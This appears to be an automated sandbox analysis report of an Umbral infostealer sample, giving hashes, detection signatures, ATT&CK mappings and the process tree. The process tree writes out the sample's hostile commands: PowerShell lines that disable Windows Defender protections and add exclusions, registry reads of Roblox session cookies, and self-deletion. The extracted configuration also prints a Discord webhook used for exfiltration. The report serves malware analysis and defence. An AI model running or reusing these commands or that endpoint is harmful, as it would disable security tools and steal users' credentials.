Analysis
- max time kernel: 94s
- max time network: 96s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-09-2024 18:21
- Static task: static1
- Behavioral task: behavioral1
- Sample: explorer (1).exe
- Resource: win7-20240903-en
General
- Target: explorer (1).exe
- Size: 1.3MB
- MD5: 575b9fa5e916d6e0fe48003127c0e7b3
- SHA1: ea732f7fcd8e0f20f8c66c8a0ab20880851c2f6e
- SHA256: e45dc08a9c9c96afdcbb33dc108417df2ec52ccb0bb1f776bc83770c70ef4739
- SHA512: 3f337262446aad13ad05589f170149b916692ef4dffd1f005029dcbd01a6e703442d19678641501d466df9f3e264ed946ee39290141fc470ba545725d8fd3f14
- SSDEEP: 24576:StvMlasKkTqxNx5V27DeEhP959IY9noqx78BXO/1byJRT:0gep23b9IUoqxT/1byJ
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom
Signatures
-
Detect Umbral payload 4 IoCs
resource | yara_rule
behavioral2/memory/904-2-0x00000000003D0000-0x000000000086E000-memory.dmp | family_umbral
behavioral2/memory/904-51-0x00000000003D0000-0x000000000086E000-memory.dmp | family_umbral
behavioral2/memory/904-131-0x00000000003D0000-0x000000000086E000-memory.dmp | family_umbral
behavioral2/memory/904-135-0x00000000003D0000-0x000000000086E000-memory.dmp | family_umbral
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
1840 | powershell.exe
3108 | powershell.exe
3588 | powershell.exe
4572 | powershell.exe
-
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | explorer (1).exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
23 | discord.com
24 | discord.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
10 | ip-api.com
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid | Process
904 | explorer (1).exe
904 | explorer (1).exe
904 | explorer (1).exe
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wmic.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wmic.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer (1).exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wmic.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PING.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wmic.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wmic.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
2832 | PING.EXE
3408 | cmd.exe
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid | Process
2164 | wmic.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
2832 | PING.EXE
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid | Process
904 | explorer (1).exe
1840 | powershell.exe
1840 | powershell.exe
3108 | powershell.exe
3108 | powershell.exe
3588 | powershell.exe
3588 | powershell.exe
4412 | powershell.exe
4412 | powershell.exe
4572 | powershell.exe
4572 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 904 | explorer (1).exe
Token: SeIncreaseQuotaPrivilege | 3984 | wmic.exe
Token: SeSecurityPrivilege | 3984 | wmic.exe
Token: SeTakeOwnershipPrivilege | 3984 | wmic.exe
Token: SeLoadDriverPrivilege | 3984 | wmic.exe
Token: SeSystemProfilePrivilege | 3984 | wmic.exe
Token: SeSystemtimePrivilege | 3984 | wmic.exe
Token: SeProfSingleProcessPrivilege | 3984 | wmic.exe
Token: SeIncBasePriorityPrivilege | 3984 | wmic.exe
Token: SeCreatePagefilePrivilege | 3984 | wmic.exe
Token: SeBackupPrivilege | 3984 | wmic.exe
Token: SeRestorePrivilege | 3984 | wmic.exe
Token: SeShutdownPrivilege | 3984 | wmic.exe
Token: SeDebugPrivilege | 3984 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 3984 | wmic.exe
Token: SeRemoteShutdownPrivilege | 3984 | wmic.exe
Token: SeUndockPrivilege | 3984 | wmic.exe
Token: SeManageVolumePrivilege | 3984 | wmic.exe
Token: 33 | 3984 | wmic.exe
Token: 34 | 3984 | wmic.exe
Token: 35 | 3984 | wmic.exe
Token: 36 | 3984 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 3984 | wmic.exe
Token: SeSecurityPrivilege | 3984 | wmic.exe
Token: SeTakeOwnershipPrivilege | 3984 | wmic.exe
Token: SeLoadDriverPrivilege | 3984 | wmic.exe
Token: SeSystemProfilePrivilege | 3984 | wmic.exe
Token: SeSystemtimePrivilege | 3984 | wmic.exe
Token: SeProfSingleProcessPrivilege | 3984 | wmic.exe
Token: SeIncBasePriorityPrivilege | 3984 | wmic.exe
Token: SeCreatePagefilePrivilege | 3984 | wmic.exe
Token: SeBackupPrivilege | 3984 | wmic.exe
Token: SeRestorePrivilege | 3984 | wmic.exe
Token: SeShutdownPrivilege | 3984 | wmic.exe
Token: SeDebugPrivilege | 3984 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 3984 | wmic.exe
Token: SeRemoteShutdownPrivilege | 3984 | wmic.exe
Token: SeUndockPrivilege | 3984 | wmic.exe
Token: SeManageVolumePrivilege | 3984 | wmic.exe
Token: 33 | 3984 | wmic.exe
Token: 34 | 3984 | wmic.exe
Token: 35 | 3984 | wmic.exe
Token: 36 | 3984 | wmic.exe
Token: SeDebugPrivilege | 1840 | powershell.exe
Token: SeDebugPrivilege | 3108 | powershell.exe
Token: SeDebugPrivilege | 3588 | powershell.exe
Token: SeDebugPrivilege | 4412 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1256 | wmic.exe
Token: SeSecurityPrivilege | 1256 | wmic.exe
Token: SeTakeOwnershipPrivilege | 1256 | wmic.exe
Token: SeLoadDriverPrivilege | 1256 | wmic.exe
Token: SeSystemProfilePrivilege | 1256 | wmic.exe
Token: SeSystemtimePrivilege | 1256 | wmic.exe
Token: SeProfSingleProcessPrivilege | 1256 | wmic.exe
Token: SeIncBasePriorityPrivilege | 1256 | wmic.exe
Token: SeCreatePagefilePrivilege | 1256 | wmic.exe
Token: SeBackupPrivilege | 1256 | wmic.exe
Token: SeRestorePrivilege | 1256 | wmic.exe
Token: SeShutdownPrivilege | 1256 | wmic.exe
Token: SeDebugPrivilege | 1256 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 1256 | wmic.exe
Token: SeRemoteShutdownPrivilege | 1256 | wmic.exe
Token: SeUndockPrivilege | 1256 | wmic.exe
Token: SeManageVolumePrivilege | 1256 | wmic.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
904 | explorer (1).exe
-
Suspicious use of WriteProcessMemory 39 IoCs
description | pid | Process | procid_target
PID 904 wrote to memory of 3984 | 904 | explorer (1).exe | 83
PID 904 wrote to memory of 3984 | 904 | explorer (1).exe | 83
PID 904 wrote to memory of 3984 | 904 | explorer (1).exe | 83
PID 904 wrote to memory of 1136 | 904 | explorer (1).exe | 86
PID 904 wrote to memory of 1136 | 904 | explorer (1).exe | 86
PID 904 wrote to memory of 1136 | 904 | explorer (1).exe | 86
PID 904 wrote to memory of 1840 | 904 | explorer (1).exe | 88
PID 904 wrote to memory of 1840 | 904 | explorer (1).exe | 88
PID 904 wrote to memory of 1840 | 904 | explorer (1).exe | 88
PID 904 wrote to memory of 3108 | 904 | explorer (1).exe | 93
PID 904 wrote to memory of 3108 | 904 | explorer (1).exe | 93
PID 904 wrote to memory of 3108 | 904 | explorer (1).exe | 93
PID 904 wrote to memory of 3588 | 904 | explorer (1).exe | 95
PID 904 wrote to memory of 3588 | 904 | explorer (1).exe | 95
PID 904 wrote to memory of 3588 | 904 | explorer (1).exe | 95
PID 904 wrote to memory of 4412 | 904 | explorer (1).exe | 97
PID 904 wrote to memory of 4412 | 904 | explorer (1).exe | 97
PID 904 wrote to memory of 4412 | 904 | explorer (1).exe | 97
PID 904 wrote to memory of 1256 | 904 | explorer (1).exe | 100
PID 904 wrote to memory of 1256 | 904 | explorer (1).exe | 100
PID 904 wrote to memory of 1256 | 904 | explorer (1).exe | 100
PID 904 wrote to memory of 4844 | 904 | explorer (1).exe | 102
PID 904 wrote to memory of 4844 | 904 | explorer (1).exe | 102
PID 904 wrote to memory of 4844 | 904 | explorer (1).exe | 102
PID 904 wrote to memory of 3752 | 904 | explorer (1).exe | 104
PID 904 wrote to memory of 3752 | 904 | explorer (1).exe | 104
PID 904 wrote to memory of 3752 | 904 | explorer (1).exe | 104
PID 904 wrote to memory of 4572 | 904 | explorer (1).exe | 106
PID 904 wrote to memory of 4572 | 904 | explorer (1).exe | 106
PID 904 wrote to memory of 4572 | 904 | explorer (1).exe | 106
PID 904 wrote to memory of 2164 | 904 | explorer (1).exe | 108
PID 904 wrote to memory of 2164 | 904 | explorer (1).exe | 108
PID 904 wrote to memory of 2164 | 904 | explorer (1).exe | 108
PID 904 wrote to memory of 3408 | 904 | explorer (1).exe | 112
PID 904 wrote to memory of 3408 | 904 | explorer (1).exe | 112
PID 904 wrote to memory of 3408 | 904 | explorer (1).exe | 112
PID 3408 wrote to memory of 2832 | 3408 | cmd.exe | 114
PID 3408 wrote to memory of 2832 | 3408 | cmd.exe | 114
PID 3408 wrote to memory of 2832 | 3408 | cmd.exe | 114
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
1136 | attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\explorer (1).exe (level 1, PID 904)
  Command line: "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
  - Drops file in Drivers directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\Wbem\wmic.exe (level 2, PID 3984)
    Command line: "wmic.exe" csproduct get uuid
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\attrib.exe (level 2, PID 1136)
    Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 1840)
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer (1).exe'
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 3108)
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 3588)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 4412)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\Wbem\wmic.exe (level 2, PID 1256)
    Command line: "wmic.exe" os get Caption
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\Wbem\wmic.exe (level 2, PID 4844)
    Command line: "wmic.exe" computersystem get totalphysicalmemory
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\Wbem\wmic.exe (level 2, PID 3752)
    Command line: "wmic.exe" csproduct get uuid
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 4572)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\SysWOW64\Wbem\wmic.exe (level 2, PID 2164)
    Command line: "wmic" path win32_VideoController get name
    - System Location Discovery: System Language Discovery
    - Detects videocard installed

  C:\Windows\SysWOW64\cmd.exe (level 2, PID 3408)
    Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe" && pause
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\PING.EXE (level 3, PID 2832)
      Command line: ping localhost
      - System Location Discovery: System Language Discovery
      - System Network Configuration Discovery: Internet Connection Discovery
      - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
- Filesize: 2KB
  MD5: 3d086a433708053f9bf9523e1d87a4e8
  SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
  SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
  SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
- Filesize: 18KB
  MD5: 78085515614fa352c2e30ff050cd06a3
  SHA1: bc057d8adf14372e2d62ef70fa62482783e408da
  SHA256: f66b96adb56be3a00663094179de324f8b02cf1ff0cd732c954cbdb9c1d3195d
  SHA512: 5a012ad492a3119f5413302d13e165c516df1d6e8af9c606d194378ebee759d6e0866d730f36795672fed24c5ccdd9135bc5b64671ed03c2d4e88b3c6e0cb56d
- Filesize: 17KB
  MD5: 5e75ee31b7e34ba3669f9af64dab0358
  SHA1: 41ff4a90bacdc1003476152145febd40654e36d2
  SHA256: ed15715eb8455efc2a223c2eebd883384933ddfba48751d513a9d9dcb5402509
  SHA512: a5db964b7c78c504f16d39791ff3c7e45be78fab8c912e5fe13c8a6f6ae147288a8d49346265d33fd164667852af3cc72c2124b4dcfd6e313d8a80b8ebf34fe8
- Filesize: 18KB
  MD5: c4fd743ec3f49eae45150d7c7736f446
  SHA1: 6a28da1291d4477c07d5727a43b688509e2d0dba
  SHA256: ac4753cb1c79be0ff7b38a9e0603545c7bd0bac2a0ad8c354ccae24784c42aca
  SHA512: 11968c19761ad05a6e53c7c825323e65b011cab5b6f2c9ff05c74c4acabc263847a2f7f128404b736e7af6301302253c6b12863040eaad97e228effe1701c552
- Filesize: 14KB
  MD5: 4ebde9c03347e319b051bd1b6f2b4142
  SHA1: f7cd5ab154e90662affba628412cdc840c15813a
  SHA256: 6a824610ec3281d64ea8a72afe8634cfa430e63d175ffbc910adfc21bb0ab613
  SHA512: 5ee84e6b96302a668da8b2aed8d66389cec39863dc72f4c25b3e800f1273d325ae39b3cb4458acfb387dcb3971adbd47716faec83d628a0edf8fde33ba8547ac
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82